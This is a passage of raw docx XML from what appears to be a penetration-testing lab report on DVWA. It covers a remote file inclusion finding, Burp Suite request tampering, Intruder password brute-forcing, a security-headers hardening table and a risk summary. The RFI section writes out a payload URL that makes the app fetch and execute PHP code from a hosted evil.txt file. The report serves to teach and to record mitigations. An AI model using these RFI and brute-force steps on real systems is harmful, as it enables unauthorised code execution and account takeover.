      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>reated a payload file (evil.txt) containing PHP code that prints a marker string and executes the 'whoami' system command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Hosted the payload using Python's built-in HTTP server on the same lab machine (simulating a remote attacker server).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Set the 'page' </w:t>
      </w:r>
      <w:r>
        <w:t>parameter to the full URL of the hosted payload, causing DVWA to fetch and execute it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Confirmed successful remote code execution via the returned 'whoami' output, and reverted allow_url_include to Off afterward.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:before="150" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload(s) Used</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="100" w:right="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http://127.0.0.1/dvwa/vulne</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rabilities/fi/?page=http://127.0.0.1:8000/evil.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:before="150" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4953000" cy="4810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4810125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="250"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>RFI — successful code execution (marker + whoami output)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:before="150" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Full remote code execution on the web server, with the privileges of the web server process (www-data). In a real-world scenario this could allow an attacker to install a web shell, pivot further into the internal network, or exfiltrate sensitive data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:before="150" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ommended Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Keep allow_url_include and allow_url_fopen disabled in production PHP configurations (the current PHP default), validate and allow-list any user-supplied file identifiers, and never pass raw user input into include()/require() statement</w:t>
      </w:r>
      <w:r>
        <w:t>s.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4. Burp Suite Testing Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.1 Intercepting &amp; Modifying Requests</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Firefox was configured to route traffic through Burp Suite's proxy (127.0.0.1:8080). With interception enabled, a DVWA login request was captured mid-flight and its 'password' paramet</w:t>
      </w:r>
      <w:r>
        <w:t>er was modified before forwarding, demonstrating that an attacker with proxy access can alter any client-submitted value — including ones a client-side script might otherwise validate — before it reaches the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:before="150" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4953000" cy="2428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428875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="250"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Burp Proxy — intercepted raw login request</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.2 Automated Fuzzing with Intruder</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The captured login request was sent to Burp Intruder, the pas</w:t>
      </w:r>
      <w:r>
        <w:t>sword parameter was marked as the sole attack position (Sniper attack type), and a payload list of candidate passwords was loaded. The attack was run and results were sorted by response length to identify the single request whose response differed from all</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> failed-login attempts, confirming the correct credential.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:before="150" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4953000" cy="4810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4810125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="250"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Intruder — attack position marked on password parameter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:before="150" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4953000" cy="2433099"/>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b="49417"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4953000" cy="2433099"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="250"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Intruder — results table showing the successful login by differing response length</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>5. Web Security Headers Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>A reference public site was scanned via securityheaders.com to establish a benchmark for a well-configured site's security headers. DVWA</w:t>
      </w:r>
      <w:r>
        <w:t>'s own response headers were then inspected via browser DevTools, found to be missing key protective headers, and hardened via Apache configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:before="150" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4953000" cy="4810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4810125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="250"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>securityheaders.com scan of reference site</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Headers Implemented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923145">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2563EB"/>
          </w:tcPr>
          <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Header</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6950" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2563EB"/>
          </w:tcPr>
          <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00923145">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>X-Frame-Options</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6950" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Prevents the page from being embedded in an &lt;iframe&gt; on another site — blocks clickjacking.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00923145">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>X-Content-Type-Options</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6950" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Stops browsers from MIME-sniffing responses, preventing disguised file execution.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00923145">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Referrer-Policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6950" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Limits how much URL information is leaked to other sites via the Referer header.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00923145">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Permissions-Policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6950" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Disables unused browser features (camera, mic, geolocation) to reduce attack surface.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00923145">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Content-Security-Policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6950" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Restricts which sources scripts/styles/images may load from — primary defence against XSS.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00923145" w:rsidRDefault="00923145">
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:before="150" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4953000" cy="4810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4810125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="250"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>DVWA response headers after hardening (all 5 headers present)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>6. Summary of Findings &amp; Risk Ratings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550"/>
      </w:tblGrid>
      <w:tr w:rsidR="00923145">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2563EB"/>
          </w:tcPr>
          <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2563EB"/>
          </w:tcPr>
          <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Risk Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2563EB"/>
          </w:tcPr>
          <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2550" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2563EB"/>
          </w:tcPr>
          <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Mitigation Verified</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00923145">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
            <w:r>
              <w:rPr>
                <w:color w:val="15803D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Fixed (High)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2550" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Prepared Statements</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00923145">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>XSS — Stored</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C2410C"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
            <w:r>
              <w:rPr>
                <w:color w:val="15803D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Fixed (High)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2550" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Input Validation + CSP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00923145">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>XSS — Reflected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C2410C"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
            <w:r>
              <w:rPr>
                <w:color w:val="15803D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Fixed (High)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2550" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Input Validation + CSP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00923145">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
          </w:tcPr>
